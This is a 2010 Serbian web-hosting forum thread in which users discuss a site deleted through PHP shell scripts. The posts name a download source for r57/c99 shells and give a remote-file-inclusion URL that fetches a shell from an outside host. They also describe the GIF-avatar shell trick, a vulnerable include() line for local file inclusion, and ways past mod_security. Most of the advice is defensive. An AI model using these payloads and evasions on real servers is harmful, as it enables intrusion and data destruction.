|
Web Hosting, web serveri i operativni sistemi Komercijalni hosting, web serveri, bezbednost, operativni sistemi na serverima |
![]() |
|
Alati teme | Način prikaza |
|
![]() |
#1 |
Web designer
Professional
|
![]() Sve te shell scripte mozes da preuzmes, testiras i includujes sa r57.gen.tr/
Generalno ako ti je sajt lose napisan, postoji sansa da napadac pozove scriptu na sledeci nacin: tvojsajt.com/nesto.php?inc=http://r57.gen.tr/99.txt? (primer, umesto ucitavanja lokalnog fajla/strane/itd. preuzima i izvrsava php file direkt na tvom serveru, gde dobija pristup listanju, citanju, brisanju, izmeni itd, zavisno od permisija, generalno dovoljno mu je da moze da procita recimo config fajl i da ti zagorca zivot) Videces u logovima, trazi zahteve koji sadrze "http://", ".txt", ".gif" ka drugim sajtovima, lako ces naci... Pored includovanja, obrati i paznju na upload forme, jedno vreme je phpBB imao sledeci trip: registrujes se kao korisnik na forumu, skines shell scriptu, promenis joj extenziju u .gif, u korisnickom panelu postavis svoj avatar, i onda posto je poznata putanja za upload avatar pokrenes scriptu i dalje radis sta pozelis, kako su to uspeli nije mi jasno, ali mislim da je brzo zakrpljeno (da ne spominjem sto su ljudi u sliku ubacivali php code). Sve zavisi od servera, ja sam imao dosta problema sto se tih scripti tice, jer je klijent drzao stari sajt na Veratu, gde hvala Bogu nemaju nikakav backup, ja sam uradio novi sajt, postavio umesto starog, medjutim nakon sto je "haker" obrisao kompletan sajt trazio sam od administratora da mi posalje logove, pa sam posle par sati ustanovio da nije uploadovana scripta preko mog sajta i da je ista osoba (info: zone-h.org) to vece obrisala preko 90 sajtova, predpostavljam da je na nekom sajtu pronasao propust, uploadovao shell scriptu i isao redom u foldere i brisao sve sto je uspeo (mislim na citanje config fajlova, editovanje) itd. Moj predlog ti je da promenis pass za bazu, ftp i instaliras mod_security ako si u mogucnosti :\ Ono sto sam se uverio licno, postavi recimo r57 ili c99 na bilo koji hosting, pokreni i moci ces da "hakujes" vecinu sajtova na tom serveru. Adminu iz Verata sam pre godinu-dve postavio r57 i izlistao im sve sajtove koji su bili na tom serveru gde je klijent drzao sajt, pokazao im sta i kako funkcionise cisto da bi mogli da se zastite, nakon toga sam klijentu predlozio da zakupi hosting na drugom mestu, i naravno vise nije imao tih problema, da li su me u Veratu poslusali ne znam.... Poslednja izmena od bluesman : 18. 03. 2010. u 12:09. |
![]() |
![]() |
![]() |
#2 |
novi član
Na probnom radu
Datum učlanjenja: 23.07.2009
Lokacija: U qtji; chuj gde...
Poruke: 23
Hvala: 4
5 "Hvala" u 3 poruka
![]() |
![]() @3banchi, base64_decode() to što je u eval().
@twix, osiguravanje servera je malo više od instaliranja mod_security, koji je sam po sebi đubre. Ne mora shell da bude na http:// Chini mi se da je upravo sa mod_security pre bila fora ftp://.../shell.txt... Toliko o zaustavljanju RFI-a. Ne mora da bude php shell. Odnosno, disejblovanje suidnih funkcija. Može i perl (cgi) i "apache" shell (fora s' htaccess-om) To sa phpBB-om je verovatno bilo uz pomoć LFI. Jedino tako može da se pokrene PHP shell u gif-u. Moj predlog je da, uz ono što si ti naveo, pregleda sve PHP fajlove izmenjene u skorije vreme...uz nadu da ih nije touch. Edit: Ipak bi bilo gzdeflate(base64_decode({stvar iz eval()})) ![]() Edit #2 (@msg #6): I give up... Poslednja izmena od AnonymousCoward : 18. 03. 2010. u 00:41. Razlog: Nova poruka 3banchi-a |
![]() |
![]() |
![]() |
#3 | ||
branislav mandic mando
Wrote a book
Datum učlanjenja: 30.10.2009
Lokacija: NS
Poruke: 1.241
Hvala: 261
486 "Hvala" u 189 poruka
![]() ![]() ![]() ![]() ![]() |
![]() Citat:
Tako da mi je sad ovo sto si naveo o ubacivanju php koda u gif i sl. extenzije i povezivanje toga sa shellom malo jasnije. Citat:
__________________
... Ej, živote, teško ovo jebote, mani me se živote, ti ga nabijem! |
||
![]() |
![]() |
![]() |
#4 |
novi član
Na probnom radu
Datum učlanjenja: 23.07.2009
Lokacija: U qtji; chuj gde...
Poruke: 23
Hvala: 4
5 "Hvala" u 3 poruka
![]() |
![]() Ummm ja bih još jednom pokušao da se uključim u temu kada sam se već javio...a i volim ovakve teme
Da pokušam da pojasnim to sa shellom u gifu: To sa PHP-om u njoj je slično steganografiji (sakrivanje teksta (valjda se tako kaže na srpskom ![]() Ali, internet media type aka MIME za gif je slika... Dakle, otvoriće mu se standardna slika a ne PHP shell (tj. neće se exec PHP kod). Osim ako nije nekim čudom na tom serveru gif = application/x-httpd-php Sa LFI radi zato što to izgleda tipa: Kôd:
include('images/'.$_GET['štagod']); //<-idealan slučaj = http://sajt.tld/skripta.php?štagod=aploadovana_slika_sa_php_kodom.gif Tako da ovo što si zadnje napisao meni nema nikakvog smisla. Reći ću ovako sada (just in case): Ja bih pregledao logove da vidim kako je taj PHP završio gde je završio i fajlove koji su skoro izmenjeni jer mi i nije baš uteha menjanje passworda ako neko može opet da vidi to... (Za svaki slučaj: pod onim touch sam mislio na: en.wikipedia.org/wiki/Touch_(Unix) ili php.net/touch ili....) |
![]() |
![]() |
![]() |
|
|
![]() |
||||
Tema | Početna poruka teme | Forum | Odgovori | Poslednja poruka |
httpool - iskustva | Milan G. | Marketing i SEO | 38 | 23. 10. 2010. 20:59 |
citanje shell output-a tokom izvrsavanja komande | ivanhoe | PHP | 3 | 07. 07. 2010. 01:07 |
Iskustva sa Silverstripe CMS | SiniX | Web aplikacije, web servisi i software | 2 | 27. 01. 2010. 23:49 |